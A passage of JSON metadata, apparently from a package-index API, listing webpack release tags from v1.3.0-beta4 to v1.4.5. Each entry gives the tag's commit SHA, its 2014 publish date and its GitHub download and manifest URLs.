github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https: